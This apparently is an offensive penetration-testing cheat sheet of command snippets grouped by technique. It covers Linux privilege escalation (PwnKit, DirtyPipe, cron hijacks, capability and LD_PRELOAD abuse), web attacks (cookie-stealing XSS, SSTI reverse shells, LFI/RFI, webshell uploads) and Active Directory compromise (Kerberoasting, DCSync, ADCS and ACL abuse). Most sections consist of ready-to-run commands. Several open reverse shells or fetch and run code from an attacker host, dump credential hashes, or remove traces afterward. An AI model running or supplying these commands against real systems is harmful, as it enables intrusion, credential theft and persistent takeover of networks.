# Works on most Ubuntu/Debian/CentOS with polkit installed
# Try this FIRST on any Ubuntu target
# https://github.com/ly4k/PwnKit
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit
# ============================================================
# DirtyPipe (CVE-2022-0847) — kernel 5.8 to 5.16.11
# ============================================================
# https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
gcc -o dirtypipe exploit.c
./dirtypipe /usr/bin/su
# ============================================================
# DirtyCow (CVE-2016-5195) — kernel 2.6.22 to 4.8.3
# ============================================================
# https://github.com/firefart/dirtycow
gcc -pthread dirty.c -o dirty -lcrypt
./dirty P@ssw0rd
# Creates user "firefart" with root privileges
su firefart
# ============================================================
# NOTES
# ============================================================
# - On Ubuntu, always try PwnKit first
# - Search Google for "kernel <version> privilege escalation"
# - Check searchsploit for matching exploits
# - Compile exploits on a similar OS/arch to avoid library issues
# - Transfer compiled binary to target for execution
|
Linux-Cron-Hijack
Shell
-
# ============================================================
# ENUMERATION — Find cron jobs
# ============================================================
# List current user cron jobs
crontab -l
# List root cron jobs (if readable)
sudo crontab -l
# View system-wide cron table
cat /etc/crontab
# List all cron directories and their contents
ls -la /etc/cron.*
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /etc/cron.weekly/
ls -la /etc/cron.monthly/
# Check systemd timers (modern alternative to cron)
systemctl list-timers
# ============================================================
# ENUMERATION — Monitor processes without root using pspy
# ============================================================
# Transfer pspy to target and run to watch for cron-triggered processes
# https://github.com/DominicBreuker/pspy
./pspy64
# For 32-bit systems:
./pspy32
# ============================================================
# EXPLOIT 1: PATH hijack in cron jobs
# ============================================================
# If /etc/crontab has: PATH=/home/sec_user:/usr/local/sbin:...
# And cron runs a command WITHOUT full path (e.g., "backup.sh")
# Create a malicious version in the first writable PATH directory
echo '#!/bin/bash' > /home/sec_user/backup.sh
echo 'bash -i >& /dev/tcp/10.10.10.21/4444 0>&1' >> /home/sec_user/backup.sh
chmod +x /home/sec_user/backup.sh
# ============================================================
# EXPLOIT 2: Writable cron script modification
# ============================================================
# If the cron script itself is world-writable, inject a reverse shell
echo 'bash -i >& /dev/tcp/10.10.10.21/4444 0>&1' >> /opt/scripts/backup.sh
# ============================================================
# EXPLOIT 3: Writable cron directory
# ============================================================
# If /etc/cron.d/ or similar is writable, add a new cron job
echo '* * * * * root bash -i >& /dev/tcp/10.10.10.21/4444 0>&1' > /etc/cron.d/revshell
# ============================================================
# EXPLOIT 4: Wildcard injection (tar cron job)
# ============================================================
# If cron runs: tar czf /tmp/backup.tar.gz *
# Create files that become tar command-line arguments
echo "" > "/path/--checkpoint=1"
echo "" > "/path/--checkpoint-action=exec=sh shell.sh"
# Create the payload script
echo '#!/bin/bash' > /path/shell.sh
echo 'bash -i >& /dev/tcp/10.10.10.21/4444 0>&1' >> /path/shell.sh
chmod +x /path/shell.sh
|
Linux-Capabilities
Shell
-
# ============================================================
# ENUMERATION — Find binaries with capabilities
# ============================================================
# Enumerate all binaries with capabilities recursively
getcap -r / 2>/dev/null
# ============================================================
# cap_setuid — Set UID to 0 (root) and spawn shell
# ============================================================
# --- cap_setuid on Python ---
# If: /usr/bin/python3 = cap_setuid+ep
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# --- cap_setuid on Perl ---
# If: /usr/bin/perl = cap_setuid+ep
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
# --- cap_setuid on Node ---
# If: /usr/bin/node = cap_setuid+ep
/usr/bin/node -e 'process.setuid(0); require("child_process").spawn("/bin/bash", {stdio: [0, 1, 2]})'
# --- cap_setuid on Ruby ---
# If: /usr/bin/ruby = cap_setuid+ep
/usr/bin/ruby -e 'Process::Sys.setuid(0); exec "/bin/bash"'
# --- cap_setuid on PHP ---
# If: /usr/bin/php = cap_setuid+ep
/usr/bin/php -r 'posix_setuid(0); system("/bin/bash");'
# ============================================================
# cap_dac_read_search — Read any file on the system
# ============================================================
# If: /usr/bin/tar = cap_dac_read_search+ep
/usr/bin/tar czf /tmp/shadow.tar.gz /etc/shadow
tar xzf /tmp/shadow.tar.gz
cat etc/shadow
# If: /usr/bin/cat = cap_dac_read_search+ep
/usr/bin/cat /etc/shadow
/usr/bin/cat /root/.ssh/id_rsa
# ============================================================
# cap_dac_override — Write any file on the system
# ============================================================
# If a binary has cap_dac_override, it can write to any file
# Use this to overwrite /etc/passwd or /etc/shadow
# or write an SSH key to /root/.ssh/authorized_keys
# ============================================================
# cap_net_raw — Packet capture (credential sniffing)
# ============================================================
# If: /usr/bin/tcpdump = cap_net_raw+ep
tcpdump -i any -w /tmp/capture.pcap
# Analyze for cleartext credentials (FTP, HTTP, Telnet, etc.)
# If: /usr/bin/python3 = cap_net_raw+ep
# Can use scapy for packet sniffing
|
LDAP-Enumeration
Credentials
-
ldapsearch -x -H ldap://10.10.10.27 -D 'sec_user@senshu.local' -w 'P@ssw0rd' -b 'DC=senshu,DC=sh' '(objectClass=user)'
nxc ldap 10.10.10.27 -u 'sec_user' -p 'P@ssw0rd' --users
nxc ldap 10.10.10.27 -u 'sec_user' -p 'P@ssw0rd' --groups
kerbrute userenum -d senshu.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.27
impacket-GetADUsers -all -dc-ip 10.10.10.27 senshu.local/sec_user:'P@ssw0rd'
# adPEAS (from Windows):
# . .\adPEAS.ps1; Invoke-adPEAS -Domain senshu.local
|
LD-PRELOAD-Hijack
-
# Check if LD_PRELOAD is preserved in sudo:
sudo -l
# Look for: env_keep+=LD_PRELOAD
# Create malicious shared object (evil.c):
cat << 'EOF' > /tmp/evil.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}
EOF
# Compile the shared object:
gcc -fPIC -shared -nostartfiles -o /tmp/evil.so /tmp/evil.c
# Execute with LD_PRELOAD (use any program from sudo -l):
sudo LD_PRELOAD=/tmp/evil.so program_from_sudo_l
|
|
LAPS-Abuse
|
|
Kerberos-Enumeration
|
Kerberoasting
Shell
-
# --- Rubeus ---
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast /domain:senshu.local
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast /domain:senshu.local /rc4opsec
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast /domain:senshu.local /aes
.\Rubeus.exe kerberoast /user:targetuser /outfile:hashes.kerberoast /domain:senshu.local /simple
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast /domain:senshu.local /creduser:sec_user /credpassword:'P@ssw0rd'
# --- AD Module ---
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# --- PowerView ---
Import-Module .\PowerView.ps1
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv -NoTypeInformation kerberoast.csv
# Targeted Kerberoasting — GenericWrite on user, explicit $Cred (run as different user)
$SecPassword = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('senshu.local\sec_user', $SecPassword)
Set-DomainObject -Credential $Cred -Identity targetuser -Server DC01.senshu.local -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainSPNTicket -Credential $Cred -SPN "nonexistent/BLAHBLAH" | fl
Set-DomainObject -Credential $Cred -Identity targetuser -Clear serviceprincipalname
|
Host-Discovery
-
# ICMP ping sweep:
nmap -sn 10.10.10.0/24
# ARP discovery (local subnet):
nmap -sn -PR 10.10.10.0/24
# TCP SYN ping (when ICMP blocked):
nmap -sn -PS22,80,443,445 10.10.10.0/24
# fping — fast ICMP sweep:
fping -asgq 10.10.10.0/24
# arp-scan — Layer 2 discovery:
arp-scan -l
# masscan — fast port-based discovery:
masscan 10.10.10.0/24 -p 22,80,443,445 --rate=1000
# Bash ping sweep (no tools needed):
for i in {1..255} ;do (ping -c 1 192.168.110.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done
|
Hashcat-Rule-Gen
-
# Generate passwords from base wordlist (raw.txt = company names, usernames, seasons, years)
hashcat raw.txt --stdout -r /usr/share/hashcat/rules/best64.rule > rawpass.txt
hashcat raw.txt --stdout -r /usr/share/hashcat/rules/OneRuleToRuleThemAll.rule > rawpass.txt
hashcat raw.txt --stdout -r /usr/share/hashcat/rules/dive.rule > rawpass.txt
# Dedup
sort -u rawpass.txt -o rawpass.txt
# Spray
nxc smb 10.10.10.27 -u sec_user -p rawpass.txt
nxc smb 10.10.10.27 -u users.txt -p rawpass.txt --continue-on-success
nxc winrm 10.10.10.27 -u sec_user -p rawpass.txt
|
|
HTTP-XXE
|
HTTP-XSS
-
# Reflected XSS test
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
# Cookie stealing (stored XSS)
<script>document.location='http://10.10.10.21/?c='+document.cookie</script>
# Filter bypass
<ScRiPt>alert(1)</ScRiPt>
<script>alert`1`</script>
# DOM XSS — check: document.write(), innerHTML, eval()
# Tools
dalfox url "http://10.10.10.27/page?q=test"
|
HTTP-SSTI
-
# Detection — test for template evaluation
{{7*7}} # Jinja2, Twig — returns 49
${7*7} # Mako, FreeMarker — returns 49
#{7*7} # Ruby ERB, Thymeleaf — returns 49
{{7*'7'}} # Jinja2 returns 7777777, Twig returns 49
# Identify template engine
# If {{7*'7'}} returns "7777777" → Jinja2
# If {{7*'7'}} returns "49" → Twig
# If ${7*7} returns "49" → Mako or FreeMarker
# Jinja2 RCE payloads (Python/Flask)
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{''.__class__.__mro__[1].__subclasses__()[407]('id',shell=True,stdout=-1).communicate()}}
# Jinja2 reverse shell
{{config.__class__.__init__.__globals__['os'].popen('bash -c "bash -i >& /dev/tcp/10.10.10.21/9001 0>&1"').read()}}
# Twig RCE payloads (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
|
|
HTTP-SSRF
|
|
HTTP-SQLi
|
HTTP-Request-Smuggling
-
# CL.TE smuggling (front-end uses Content-Length, back-end uses Transfer-Encoding)
POST / HTTP/1.1
Host: 10.10.10.27
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
# TE.CL smuggling (front-end uses Transfer-Encoding, back-end uses Content-Length)
POST / HTTP/1.1
Host: 10.10.10.27
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
# Tools
python3 smuggler.py -u http://10.10.10.27
# Detect with Burp Suite
Burp > Extensions > HTTP Request Smuggler > Scan
# Obfuscated Transfer-Encoding headers
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding: chunked
Transfer-encoding: cow
|
|
HTTP-Open-Redirect
|
HTTP-NoSQL-Injection
-
# Authentication bypass — $ne operator
username[$ne]=admin&password[$ne]=pass
# Regex extraction — enumerate usernames char by char
username[$regex]=^a.*&password[$ne]=pass
username[$regex]=^ad.*&password[$ne]=pass
# JSON body — auth bypass
curl -X POST http://10.10.10.27/login -H "Content-Type: application/json" \
-d '{"username":{"$ne":""},"password":{"$ne":""}}'
# Extract password with $regex
curl -X POST http://10.10.10.27/login -H "Content-Type: application/json" \
-d '{"username":"admin","password":{"$regex":"^P.*"}}'
|
HTTP-LFI-RFI
-
# Basic LFI — read /etc/passwd
http://10.10.10.27/page?file=../../../../etc/passwd
# Null byte bypass (PHP < 5.3.4)
http://10.10.10.27/page?file=../../../../etc/passwd%00
# PHP filter — read source code as base64
http://10.10.10.27/page?file=php://filter/convert.base64-encode/resource=index.php
# PHP input wrapper — execute code via POST body
curl -X POST "http://10.10.10.27/page?file=php://input" --data "<?php system('id'); ?>"
# Data wrapper — inline code execution
http://10.10.10.27/page?file=data://text/plain,<?php phpinfo();?>
# Data wrapper — base64 encoded payload
http://10.10.10.27/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
# Log poisoning — inject PHP into User-Agent, then include log
curl -A "<?php system(\$_GET['cmd']); ?>" http://10.10.10.27/
http://10.10.10.27/page?file=../../../../var/log/apache2/access.log&cmd=id
# Remote File Inclusion — include attacker-hosted shell
http://10.10.10.27/page?file=http://10.10.10.21/shell.php
# Windows path traversal
http://10.10.10.27/page?file=..\..\..\..\windows\system32\drivers\etc\hosts
|
HTTP-File-Upload
-
# PHP webshell
<?php system($_REQUEST['cmd']); ?>
# Upload via curl
curl -F "file=@shell.php" http://10.10.10.27/upload
# Access: http://10.10.10.27/uploads/shell.php?cmd=id
# Bypass extension filters
shell.php5, shell.phtml, shell.pHp, shell.php7, shell.phar
# Bypass content-type check
curl -F "file=@shell.php;type=image/jpeg" http://10.10.10.27/upload
# Double extension bypass
shell.php.jpg
# Null byte (older systems)
shell.php%00.jpg
|
HTTP-Enumeration
No Creds
-
gobuster dir -u http://10.10.10.27 -w /usr/share/seclists/Discovery/Web-Content/big.txt
gobuster dir -u http://10.10.10.27 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,txt,zip,sql,asp,json
ffuf -u http://10.10.10.27/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt
ffuf -u http://10.10.10.27 -H "Host: FUZZ.senshu.local" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs <default_size>
feroxbuster -u http://10.10.10.27 -w /usr/share/seclists/Discovery/Web-Content/big.txt
# Nested directory search (after finding /admin/):
gobuster dir -u http://10.10.10.27/admin/ -w /usr/share/seclists/Discovery/Web-Content/big.txt
# For port 8443 try HTTPS:
# https://10.10.10.27:8443
# WordPress scan:
docker run -it --rm wpscanteam/wpscan --url http://10.10.10.27 --enumerate vp,vt,u
# ALWAYS check page source for: admin, password, login, secret, key, .js files, commented-out sections
|
|
HTTP-Command-Injection
|
|
GPP-Passwords
|
File-Transfers
-
# --- HTTP Server (Attacker) ---
python3 -m http.server 80
# --- Linux Download ---
wget http://10.10.10.21/linpeas.sh -O /tmp/linpeas.sh
curl http://10.10.10.21/linpeas.sh -o /tmp/linpeas.sh
curl http://10.10.10.21/linpeas.sh | bash
# --- Windows PowerShell ---
Invoke-WebRequest -Uri http://10.10.10.21/winpeas.exe -OutFile C:\Temp\winpeas.exe
(New-Object Net.WebClient).DownloadFile('http://10.10.10.21/shell.exe','C:\Temp\shell.exe')
IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.21/script.ps1')
# --- Certutil ---
certutil -urlcache -f http://10.10.10.21/shell.exe C:\Temp\shell.exe
# --- SMB ---
impacket-smbserver share $(pwd) -smb2support
impacket-smbserver share $(pwd) -smb2support -user sec_user -password P@ssw0rd
# If auth required, connect first:
net use \\10.10.10.21\share /user:sec_user P@ssw0rd
copy \\10.10.10.21\share\shell.exe C:\Temp\shell.exe
copy C:\Users\sec_user\Desktop\secrets.txt \\10.10.10.21\share\secrets.txt
# --- SCP ---
scp linpeas.sh sec_user@10.10.10.27:/tmp/linpeas.sh
scp sec_user@10.10.10.27:/tmp/loot.txt ./loot.txt
# --- Netcat ---
nc -lvnp 1234 > file
nc 10.10.10.21 1234 < file
# --- Base64 (no transfer needed) ---
base64 -w 0 /tmp/secret.txt
echo "BASE64_STRING" | base64 -d > secret.txt
# --- xfreerdp drive sharing ---
xfreerdp /v:10.10.10.27 /u:sec_user /p:'P@ssw0rd' /drive:share,/tmp/tools
# Access in RDP: \\tsclient\share
|
FTP-Exploitation
Credentials
-
# Connect to FTP
ftp 10.10.10.27
Name: sec_user
Password: P@ssw0rd
# Switch to binary mode (critical for executables, webshells, images)
ftp> binary
# Switch to passive mode (use if active mode is blocked by firewall)
ftp> passive
# Upload a PHP webshell to web-accessible directory
ftp> put shell.php
# Upload an ASPX webshell (for IIS/Windows targets)
ftp> put shell.aspx
# Access the webshell from browser or curl to trigger execution
curl http://10.10.10.27/shell.php?cmd=whoami
curl http://10.10.10.27/shell.aspx
# NOTE: Always use 'binary' mode when uploading non-text files
# NOTE: Verify the FTP root maps to a web-accessible directory
# --- FTP Bounce Attack (use FTP server to port scan internal hosts) ---
nmap -Pn -b anonymous@10.10.10.27 172.16.0.0/24
# --- vsftpd 2.3.4 Backdoor Exploit ---
# Trigger by sending a username ending with :) — opens shell on port 6200
# Connect to FTP with username containing smiley
nc 10.10.10.27 21
USER backdoor:)
PASS anything
# Then connect to the backdoor shell
nc 10.10.10.27 6200
|
FTP-Enumeration
No Creds
-
# Nmap FTP scripts — check anonymous access, bounce attack, vsftpd backdoor
nmap -sCV -p 21 --script ftp-anon,ftp-bounce,ftp-vsftpd-backdoor 10.10.10.27
# Connect as anonymous (use blank password or any email)
ftp 10.10.10.27
Name: anonymous
Password: (leave blank or enter any email)
# List all files including hidden ones
ftp> ls -la
# Switch to passive mode (helps bypass firewalls, may reveal hidden files)
ftp> passive
# Switch to binary mode for non-text files (executables, images, archives)
ftp> binary
# Disable interactive prompts for batch downloads
ftp> prompt off
# Download all files in current directory
ftp> mget *
|
|
Exchange-Abuse
|
Docker-Escape
-
# Check if running inside a container:
cat /proc/1/cgroup
ls /.dockerenv
hostname
# Check if user is in the docker group:
id
groups
# Docker group abuse — mount host filesystem:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Mounted docker socket — escape via socket:
ls -la /var/run/docker.sock
docker -H unix:///var/run/docker.sock run -v /:/mnt -it alpine chroot /mnt sh
# Privileged container — mount host filesystem:
fdisk -l
mount /dev/sda1 /mnt
chroot /mnt
# Privileged container — nsenter escape:
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
# CAP_SYS_ADMIN — escape via cgroup:
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /etc/shadow > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
cat /output
|
|
Delegation-Abuse
|
|
DPAPI-Extraction
|
DNS-Enumeration
No Creds
-
nmap -p 53 --script dns-zone-transfer,dns-nsid,dns-service-discovery 10.10.10.27
dig axfr @10.10.10.27 senshu.local
nslookup
# > server 10.10.10.27
# > senshu.local
dnsenum --dnsserver 10.10.10.27 senshu.local
# Subdomain fuzzing (if domain found):
gobuster dns -d senshu.local -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -r 10.10.10.27:53
ffuf -u http://FUZZ.senshu.local -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs <default_size>
|
|
DNS-Admins-Abuse
|
DCSync
Credentials
-
# --- Grant DCSync rights first if needed (requires WriteDACL on domain root) ---
# bloodyAD — grant DCSync rights
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add dcsync sec_user
# PowerView — grant DCSync rights
Add-DomainObjectAcl -TargetIdentity "DC=senshu,DC=local" -PrincipalIdentity sec_user -Rights DCSync -Verbose
# --- Execute DCSync ---
# Secretsdump — extract all hashes via DCSync
impacket-secretsdump senshu.local/sec_user:'P@ssw0rd'@10.10.10.27
# NetExec — dump NTDS.dit via DCSync
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --ntds
# Mimikatz — DCSync specific user (e.g., krbtgt) or all
mimikatz.exe "lsadump::dcsync /user:senshu\krbtgt /domain:senshu.local"
mimikatz.exe "lsadump::dcsync /domain:senshu.local /all /csv"
mimikatz.exe "lsadump::dcsync /user:senshu\administrator /history"
|
|
Coercion-Attacks
|
BloodHound
Credentials
-
# Remote collection from Linux
bloodhound-python -u sec_user -p 'P@ssw0rd' -d senshu.local -ns 10.10.10.27 --dns-tcp -c All --zip
nxc ldap 10.10.10.27 -u sec_user -p 'P@ssw0rd' --bloodhound --collection All
# SharpHound from Windows
.\SharpHound.exe -c All --zip
# Import .zip into BloodHound GUI, run: Shortest Paths to DA, Kerberoastable, AS-REP Roastable
sudo ./BloodHound --no-sandbox
|
AdminSDHolder-Abuse
Credentials
-
# AdminSDHolder propagates ACLs to all protected groups every 60 min
# Add GenericAll on AdminSDHolder — get permanent access to Domain Admins, etc.
# Add ACE to AdminSDHolder with bloodyAD
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add genericAll 'CN=AdminSDHolder,CN=System,DC=senshu,DC=sh' sec_user
# Add ACE to AdminSDHolder with PowerView
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=senshu,DC=sh" -PrincipalIdentity sec_user -Rights All
# Wait up to 60 minutes for SDProp to propagate
# Then you have GenericAll on all protected groups (Domain Admins, Enterprise Admins, etc.)
# Verify by adding yourself to Domain Admins
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add groupMember "Domain Admins" sec_user
|
Active-Directory-Enumeration
Credentials
-
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --users
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --pass-pol
bloodhound-python -c All -u sec_user -p 'P@ssw0rd' -d senshu.local -ns 10.10.10.27 --zip
# bloodyAD — enumerate group members
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 get groupMember "Domain Admins"
# bloodyAD — find all objects you have write access to
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 get writable --detail
# bloodyAD — arbitrary LDAP search
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 get search --filter '(sAMAccountName=targetuser)'
# PowerView
Import-Module .\PowerView.ps1
Get-DomainUser | Select-Object samaccountname, memberof, description
Find-InterestingDomainAcl -ResolveGUIDs
|
|
AS-REP-Roasting
|
ADCS-Exploitation
Credentials
-
# Enumerate vulnerable templates
certipy find -u sec_user@senshu.local -p 'P@ssw0rd' -dc-ip 10.10.10.27 -vulnerable -stdout
# ESC1 — SAN specification allowed
certipy req -u sec_user@senshu.local -p 'P@ssw0rd' -dc-ip 10.10.10.27 -ca 'senshu-CA' -template 'VulnTemplate' -upn administrator@senshu.local
# ESC4 — writable template ACL (modify, then exploit as ESC1)
certipy template -u sec_user@senshu.local -p 'P@ssw0rd' -dc-ip 10.10.10.27 -template 'VulnTemplate' -save-old
# ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 flag
certipy req -u sec_user@senshu.local -p 'P@ssw0rd' -dc-ip 10.10.10.27 -ca 'senshu-CA' -template 'User' -upn administrator@senshu.local
# ESC7 — ManageCA rights abuse
certipy ca -u sec_user@senshu.local -p 'P@ssw0rd' -dc-ip 10.10.10.27 -ca 'senshu-CA' -add-officer sec_user
certipy req -u sec_user@senshu.local -p 'P@ssw0rd' -dc-ip 10.10.10.27 -ca 'senshu-CA' -template 'SubCA' -upn administrator@senshu.local
certipy ca -u sec_user@senshu.local -p 'P@ssw0rd' -dc-ip 10.10.10.27 -ca 'senshu-CA' -issue-request <request_id>
# ESC8 — NTLM relay to ADCS HTTP endpoint
certipy relay -target 'http://10.10.10.27/certsrv/certfnsh.asp' -ca 'senshu-CA' -template 'DomainController'
|
ACL-Abuse
Credentials
-
# ── $Cred setup — build this first when running PowerView as a different user than your shell ──
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('senshu.local\sec_user', $SecPassword)
# ── ENUMERATION ──────────────────────────────────────────────────────────────────────
# list every AD object your current user has write permissions over
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 get writable --detail
# show current members of a group
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 get groupMember "Domain Admins"
# find ACEs across the domain where sec_user is the trustee — resolve GUIDs to human-readable names
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "sec_user"}
# bloodyAD: enumerate domain trusts — shows direction (inbound/outbound/bidirectional) and type
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 get trusts
bloodyAD -d senshu.local -u sec_user -p aad3b435b51404eeaad3b435b51404ee:NTHASH --host 10.10.10.27 get trusts
# impacket-dacledit: read all ACEs on a specific object — enumerate who has what rights
impacket-dacledit senshu.local/sec_user:'P@ssw0rd' -dc-ip 10.10.10.27 -target targetuser -action read
impacket-dacledit senshu.local/sec_user -hashes aad3b435b51404eeaad3b435b51404ee:NTHASH -dc-ip 10.10.10.27 -target targetuser -action read
# ════════════════════════════════════════════════════════════════
# [USER] ForceChangePassword / GenericAll — reset password
# ════════════════════════════════════════════════════════════════
# bloodyAD: force-set target's password without knowing the current one
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 set password targetuser 'NewP@ssw0rd!'
# rpcclient: same via MS-SAMR — info level 23 = set password
rpcclient -U 'sec_user%P@ssw0rd' 10.10.10.27 -W senshu.local -c 'setuserinfo2 targetuser 23 NewP@ssw0rd!'
# net rpc: same over RPC, useful when rpcclient is unavailable
net rpc password "targetuser" "NewP@ssw0rd!" -U 'senshu.local/sec_user%P@ssw0rd' -S 10.10.10.27
# PowerView: convert new password to SecureString then push it to the target account
$pass = ConvertTo-SecureString 'NewP@ssw0rd!' -AsPlainText -Force
Set-DomainUserPassword -Identity targetuser -AccountPassword $pass -Credential $Cred
# impacket-dacledit: grant ResetPassword right on target — then use bloodyAD/rpcclient to set the password
impacket-dacledit senshu.local/sec_user:'P@ssw0rd' -dc-ip 10.10.10.27 -target targetuser -action write -rights ResetPassword
impacket-dacledit senshu.local/sec_user -hashes aad3b435b51404eeaad3b435b51404ee:NTHASH -dc-ip 10.10.10.27 -target targetuser -action write -rights ResetPassword
# ════════════════════════════════════════════════════════════════
# [USER] GenericWrite — targeted Kerberoasting (set SPN → ticket → clean up)
# ════════════════════════════════════════════════════════════════
# bloodyAD: write a fake SPN on the target so it becomes Kerberoastable
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 set object targetuser servicePrincipalName -v 'nonexistent/BLAHBLAH'
# request TGS ticket for the fake SPN and save for offline cracking
impacket-GetUserSPNs senshu.local/sec_user:'P@ssw0rd' -dc-ip 10.10.10.27 -request -outputfile targeted.kerberoast
# bloodyAD: remove the SPN after obtaining the hash (clean up IOC)
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 set object targetuser servicePrincipalName
# crack the TGS hash offline against a wordlist
hashcat -m 13100 targeted.kerberoast /usr/share/wordlists/rockyou.txt
# PowerView: set fake SPN on target using explicit $Cred (as a different user)
Set-DomainObject -Credential $Cred -Identity targetuser -Server DC01.senshu.local -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
# PowerView: request the TGS ticket for the fake SPN
Get-DomainSPNTicket -Credential $Cred -SPN "nonexistent/BLAHBLAH" | fl
# PowerView: clear the SPN to remove evidence after cracking
Set-DomainObject -Credential $Cred -Identity targetuser -Clear serviceprincipalname
# ════════════════════════════════════════════════════════════════
# [USER] GenericWrite — AS-REP Roasting (enable DONT_REQ_PREAUTH)
# ════════════════════════════════════════════════════════════════
# bloodyAD: disable Kerberos pre-auth on target — account now emits a crackable AS-REP
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add uac targetuser -f DONT_REQ_PREAUTH
# request AS-REP hash for accounts without pre-auth (no creds needed)
impacket-GetNPUsers senshu.local/ -usersfile users.txt -dc-ip 10.10.10.27 -no-pass -request
# bloodyAD: re-enable pre-auth to clean up
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 remove uac targetuser -f DONT_REQ_PREAUTH
# PowerView: toggle DONT_REQ_PREAUTH bit via XOR on userAccountControl (4194304 = 0x400000)
Set-DomainObject -Credential $Cred -Identity targetuser -XOR @{useraccountcontrol=4194304} -Verbose
# PowerView: verify which accounts now have pre-auth disabled
Get-DomainUser -PreauthNotRequired -Verbose
# ════════════════════════════════════════════════════════════════
# [USER] GenericWrite / AddKeyCredentialLink — Shadow Credentials
# ════════════════════════════════════════════════════════════════
# bloodyAD: add a key credential to target's msDS-KeyCredentialLink — allows PKINIT auth as that user
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add shadowCredentials targetuser
# certipy: full auto — add key credential, request TGT, retrieve NT hash
certipy shadow auto -target DC01.senshu.local -u sec_user@senshu.local -p 'P@ssw0rd' -account targetuser
# certipy: authenticate with the generated PFX to get a TGT and NT hash
certipy auth -pfx targetuser.pfx -dc-ip 10.10.10.27
# Rubeus: request TGT using the PFX certificate via PKINIT — injects ticket into current session
.\Rubeus.exe asktgt /user:targetuser /certificate:targetuser.pfx /password:certpass /domain:senshu.local /dc:DC01.senshu.local /ptt
# ════════════════════════════════════════════════════════════════
# [USER] GenericWrite — Logon Script (executes on next login)
# ════════════════════════════════════════════════════════════════
# bloodyAD: set target's scriptPath attribute to a UNC path — script runs as the user on next logon
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 set object targetuser scriptpath -v '\\10.10.10.21\share\malicious.bat'
# ════════════════════════════════════════════════════════════════
# [USER] GenericWrite — enable disabled account
# ════════════════════════════════════════════════════════════════
# bloodyAD: clear the ACCOUNTDISABLE flag so the account can authenticate again
